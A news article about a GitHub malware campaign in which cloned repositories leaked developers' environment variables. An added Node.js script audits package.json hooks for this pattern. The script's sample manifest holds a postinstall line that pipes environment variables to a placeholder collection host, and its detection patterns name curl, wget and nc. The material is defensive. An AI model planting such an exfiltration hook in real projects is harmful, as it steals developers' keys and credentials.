GitHub faces widespread malware attacks affecting projects, including crypto


Major developer platform GitHub faced a widespread malware attack and reported 35,000 “code hits” on a day that saw thousands of Solana-based wallets drained for millions of dollars.

The widespread attack was highlighted by GitHub developer Stephen Lucy, who first reported the incident earlier on Aug. 3. The developer came across the issue while reviewing a project he found on a Google search.

So far, various projects from crypto, Golang, Python, js, Bash, Docker and Kubernetes were found to be affected by the attack. The attack targets Docker images, install docs and npm scripts, which are a convenient way to bundle common shell commands for a project.

To dupe developers and access critical data, the attacker first creates a fake repository (a repository contains all of the project's files and each file's revision history) and pushes clones of legit projects to GitHub. For example, the following two snapshots show this legit crypto miner project and its clone.

[Image: Original crypto mining project. Source: GitHub]
[Image: Cloned crypto mining project. Source: GitHub]

Many of these clone repositories were pushed as “pull requests.” Pull requests let developers tell others about changes they have pushed to a branch in a repository on GitHub.


Once the developer falls prey to the malware attack, the entire set of environment variables (ENV) of the script, application, or laptop (Electron apps) is sent to the attacker's server. ENV includes security keys, AWS access keys, crypto keys and much more.
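As an added example (not code from the article or from GitHub), the following Node.js check audits a project's `package.json` scripts before a cloned repository is installed, and ranks highest any command that combines environment access with outbound network traffic, the behaviour described above. The indicator patterns, the function name `auditScripts` and the sample manifest are assumptions made for illustration.

```javascript
// npm runs these hooks automatically during `npm install`.
const AUTO_RUN_HOOKS = new Set(["preinstall", "install", "postinstall", "prepare"]);

// Heuristic indicators chosen for this example; they are not IoCs from the incident.
const INDICATORS = [
  { id: "network-fetch", re: /\b(curl|wget|nc|ncat)\b|https?:\/\// },
  { id: "pipe-to-shell", re: /\|\s*(ba|z|da)?sh\b/ },
  // The lookbehind avoids flagging helpers such as `cross-env`.
  { id: "env-dump", re: /(?<![\w-])(printenv|env)\b|process\.env\b/ },
  { id: "encoded-payload", re: /\b(base64|eval)\b/ },
  { id: "inline-interpreter", re: /\b(node|python3?|perl|ruby)\s+-[ec]\b/ },
];

// Returns one finding per script that matches at least one indicator.
function auditScripts(packageJsonText) {
  const scripts = JSON.parse(packageJsonText).scripts || {};
  const findings = [];
  for (const [name, command] of Object.entries(scripts)) {
    if (typeof command !== "string") continue;
    const hits = INDICATORS.filter((i) => i.re.test(command)).map((i) => i.id);
    if (hits.length === 0) continue;
    const autoRun = AUTO_RUN_HOOKS.has(name);
    // Environment access plus outbound traffic in one command is the shape
    // the article describes, so it outranks everything else.
    const exfilShape = hits.includes("env-dump") && hits.includes("network-fetch");
    const severity = exfilShape ? "high" : autoRun ? "review" : "info";
    findings.push({ script: name, autoRun, indicators: hits, severity });
  }
  return findings;
}

// Constructed sample manifest (not taken from any real repository).
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "constructed-example",
  scripts: {
    build: "tsc -p .",
    test: "cross-env NODE_ENV=test jest",
    postinstall: "env | curl -s --data-binary @- https://collector.example.invalid/i",
    prepare: "node -e \"require('./scripts/setup')\"",
  },
});

for (const f of auditScripts(SAMPLE_PACKAGE_JSON)) {
  console.log(`${f.severity.toUpperCase()} ${f.script}: ${f.indicators.join(", ")}`);
}
```

A clean result is not proof of safety: the same review applies to Dockerfile `RUN` lines and to commands copied from install docs, which this check does not read.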

The developer has reported the issue to GitHub and advised developers to GPG-sign the revisions they make to a repository. GPG keys add an extra layer of security to your GitHub accounts and software projects by providing a way of verifying that all revisions come from a trusted source.
